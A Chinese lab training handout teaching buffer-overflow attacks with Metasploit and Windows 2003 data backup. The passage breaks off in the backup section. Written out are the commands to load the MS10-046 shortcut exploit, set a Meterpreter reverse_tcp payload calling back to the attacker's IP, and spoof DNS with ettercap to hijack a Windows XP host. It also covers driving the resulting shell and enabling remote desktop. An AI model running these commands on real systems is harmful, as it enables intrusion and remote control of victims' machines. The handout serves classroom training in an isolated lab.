利用漏洞进行溢出攻击及数据备份VIP免费

利用漏洞进行溢出攻击及数据备份1.实训目的(后果自负)利用系统漏洞进行溢出攻击是一种现今网络上常用的一种攻击手段，它利用C等高级语言对于数据、指针以及寄存器等保护不足及程序员在开发系统时的过错，通过多重手段屏蔽用户感知，从而获取用户所传递信息或者误导用户的网络应用操作。本次练习主要目的是体验利用漏洞进行缓冲区溢出攻击。数据备份是系统管理员日常进行系统、数据维护所必需掌握的技巧及手段，本次练习应用windows2003自带的备份工具进行数据备份。2.实训所需条件及环境硬件设备：局域网（含机柜、配线架、交换机等）、台式PC机软件支撑：Windows2003、WindowsXP以及BackTract5虚拟机网络拓扑结构：3.实训内容3.1利用metasploit进行溢出攻击练习①使用metasploit开启攻击首先是进入Metasploit。可以点击【应用程序】→【BackTrack】→【ExploitationTools】→【NetworkExploitationTools】→【MetasploitFramewrok】进入Metasploit外，也可以在图形界面下打开任意一个终端，直接输入msfconsole命令来进入Metasploit。此时可以看到当前包含代码数量、参数状态及最新版本等，如下图所示，进入msf的工作平台后，输入searchms10-046查询攻击代码的存放路径，即可看到名为"ms10_046_shortcut_icon_dllloader"的相关信息。接下来，使用如下指令载入攻击代码：Usewindows/browser/ms10_046_shortcut_icon_dllloader回车后如下图所示，表示载入攻击代码成功。此时，可以通过showoptions来查看可以（必需）进行的参数配置。在了解需进行的攻击参数的配置后，接下来就可以使用set命令来依次配置参数。其中，还需设置PAYLOAD为获取windows的shellcode，即windows/metepreter/reverse_tcp。此外，由于后面攻击还要使用ettercap对目标进行DNS欺骗攻击，所以要将反弹端口的目的地设置为自身IP，即设置LHOST为自身IP。具体命令如下：setSRVHOST攻击者自身IPsetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST攻击者自身IPexploit②进行dns欺骗攻击参照在欺骗攻击练习中的操作叙述及练习视频的说明，完成对etter.dns的配置。注意这里域名对应的ip地址必需根据自己的机器的实际ip地址进行。完成域名的配置后，使用ifconfig查看使用的网络适配器的符号，然后发起欺骗攻击，如下图所示。③入侵目标主机目标主机（WindowsXP）上打开浏览器，输入网址http://www.xxx并回车，会发现浏览器的响应会变得缓慢。稍等数秒后，会发现在目标主机上的浏览器上原本应显示为www.xxx的主页，突然变成了一个名为\\192.168.60.130\XHJnSkKNjR的共享目录。如下图所示。打开攻击主机BackTrack5的Metasploit终端下，会看到目标主机因DNS欺骗而导致的重定向访问，此时目标主机被强制运行了攻击主机即192.168.60.130上Metasploit执行的漏洞攻击代码。于是在成功溢出后，攻击主机拿到了一个反向溢出Shell。如下图所示，即可获取到一个MeterpreterSession（注意倒数第三行）。此时，攻击者输入back命令回到Metasploit的根目录后，就可以使用sessions查看这个反向溢出Shell的ID号及其相关信息，然后再调用该ID即可。具体命令如下：sessionssessions-i1参数解释：-inum该参数用于调用不同ID号的成功溢出Shell，后跟的num为ID号。依次输入上述命令，就可以成功调用该反向溢出Shell，此时会看到提示符从"msf"变成了"meterpreter"，如下图所示，此时键入ps即可看到目标主机所有运行的进程。④攻击操作练习目标主机打开计算器，如下图所示，请你使用linux的kill指令将计算器的进程杀除。使用命令rungetgui–e，看看能否开启目标主机的运程管理服务。3.2挂马攻击练习开启windows2003，并运行IIS服务。然后使用如下指令，设计挂马网页。修改3.1中的dns配置，将域名对应的ip地址指向windows2003，并重复3.1的整个攻击过程。看看在目标机器上，能否察觉被攻击机入侵的痕迹？？3.3数据备份练习①实验环境准备启动windows2003（以下简称主机），并配置IIS服务器。然后复制默认网站工作目录下的所...